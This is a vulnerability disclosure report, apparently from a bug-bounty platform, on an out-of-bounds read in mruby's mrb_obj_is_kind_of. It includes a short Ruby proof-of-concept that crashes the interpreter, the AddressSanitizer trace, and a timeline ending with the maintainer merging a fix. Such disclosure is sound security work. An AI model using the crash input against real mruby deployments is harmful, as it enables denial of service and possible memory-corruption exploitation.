Out-of-bounds Read in mrb_obj_is_kind_of in in mruby/mruby

Valid

Reported on

Apr 20th 2022


Out-of-bounds Read in mrb_obj_is_kind_of in mruby/mruby

Affected commit

791635a8d1ad9aad98aae0a36a91e092e4d71944

Proof of Concept

Math.initialize() do $4
   prepend dup
   4.instance_exec(){|| super() }
end

Below is the output from mruby ASAN build:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==38614==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x000000597d2e bp 0x7ffc22840e70 sp 0x7ffc22840ce0 T0)
==38614==The signal is caused by a READ memory access.
==38614==Hint: address points to the zero page.
    #0 0x597d2e in mrb_obj_is_kind_of /root/mruby/mruby/src/object.c:468:14
    #1 0x619263 in mrb_vm_exec /root/mruby/mruby/src/vm.c:1763:12
    #2 0x6055da in mrb_vm_run /root/mruby/mruby/src/vm.c:1132:12
    #3 0x5fd9c0 in mrb_run /root/mruby/mruby/src/vm.c:3048:10
    #4 0x603853 in mrb_yield_with_class /root/mruby/mruby/src/vm.c:880:11
    #5 0x54a762 in mrb_mod_initialize /root/mruby/mruby/src/class.c:1649:5
    #6 0x616995 in mrb_vm_exec /root/mruby/mruby/src/vm.c:1646:18
    #7 0x6055da in mrb_vm_run /root/mruby/mruby/src/vm.c:1132:12
    #8 0x5ff8b9 in mrb_top_run /root/mruby/mruby/src/vm.c:3061:12
    #9 0x69b76b in mrb_load_exec /root/mruby/mruby/mrbgems/mruby-compiler/core/parse.y:6891:7
    #10 0x69cb0b in mrb_load_detect_file_cxt /root/mruby/mruby/mrbgems/mruby-compiler/core/parse.y:6934:12
    #11 0x50c5bf in main /root/mruby/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #12 0x7fa4263330b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #13 0x41d84d in _start (/root/mruby/mruby/bin/mruby+0x41d84d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/mruby/mruby/src/object.c:468:14 in mrb_obj_is_kind_of
==38614==ABORTING

Test Platform:

Ubuntu 18.04

Impact:

Possible arbitrary code execution if being exploited.

Acknowledgements

This bug was found by Ken Wong(@wwkenwong) from Black Bauhinia(@blackb6a) and Alex Cheung

Impact

Impact:

Possible arbitrary code execution if being exploited.

We are processing your report and will contact the mruby team within 24 hours. a month ago
We have contacted a member of the mruby team and are waiting to hear back a month ago
Yukihiro "Matz" Matsumoto modified the report
a month ago
Yukihiro "Matz" Matsumoto validated this vulnerability a month ago
wwkenwong has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on a4d979 a month ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
to join this conversation